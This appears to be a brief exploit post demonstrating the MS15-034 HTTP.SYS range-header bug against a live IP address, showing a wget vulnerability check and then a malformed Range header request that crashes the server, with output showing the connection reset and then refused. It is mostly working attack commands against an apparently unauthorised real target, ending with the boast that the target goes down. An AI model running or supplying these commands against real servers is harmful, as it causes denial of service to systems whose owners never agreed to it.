# Example HTTP.SYS RCE (MS15-034) with Live TARGET # email : [email protected] ## Check BUG : root@cyberking:~# wget --header="Range: bytes=0-18446744073709551615" http://103.10.62.78:8181/assets/css/core.css --2018-04-19 03:24:14-- http://103.10.62.78:8181/assets/css/core.css Connecting to 103.10.62.78:8181... connected. HTTP request sent, awaiting response... 416 Requested Range Not Satisfiable The file is already fully retrieved; nothing to do. ## Exploit : root@cyberking:~# wget --header="Range: bytes=18-18446744073709551615" http://103.10.62.78:8181/assets/css/core.css --2018-04-19 03:24:17-- http://103.10.62.78:8181/assets/css/core.css Connecting to 103.10.62.78:8181... connected. HTTP request sent, awaiting response... Read error (Connection reset by peer) in headers. Retrying. --2018-04-19 03:25:19-- (try: 2) http://103.10.62.78:8181/assets/css/core.css Connecting to 103.10.62.78:8181... failed: Connection refused. root@cyberking:~# ### TARGET WILL BE "DOWN" AFTER "EXPLOIT"
Comments